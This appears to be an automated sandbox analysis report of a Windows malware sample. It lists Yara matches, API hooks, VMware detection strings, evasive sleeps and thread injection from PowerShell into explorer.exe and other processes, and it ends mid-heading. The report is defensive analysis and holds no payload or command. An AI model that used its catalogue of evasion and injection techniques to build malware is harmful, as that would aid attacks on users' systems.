Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3102 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5790 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00F87DD8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0138E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0139888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_013A4FE1
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 32_2_04DEB9E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_013905EF
Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000020.00000000.558190996.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000023.00000002.708021051.0000021DB5A53000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.558190996.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01385BD5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_013A16A5
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: B90000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 20675470000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 88E31580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5DA000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 2980000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6328 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 3092
Source: C:\Windows\explorer.exe Thread register set: target process: 4252
Source: C:\Windows\explorer.exe Thread register set: target process: 4572
Source: C:\Windows\explorer.exe Thread register set: target process: 5708
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 6440
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: B90000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5DA000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2980000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A648000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 20675470000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
Creates a process in suspended mode (likely to inject code)
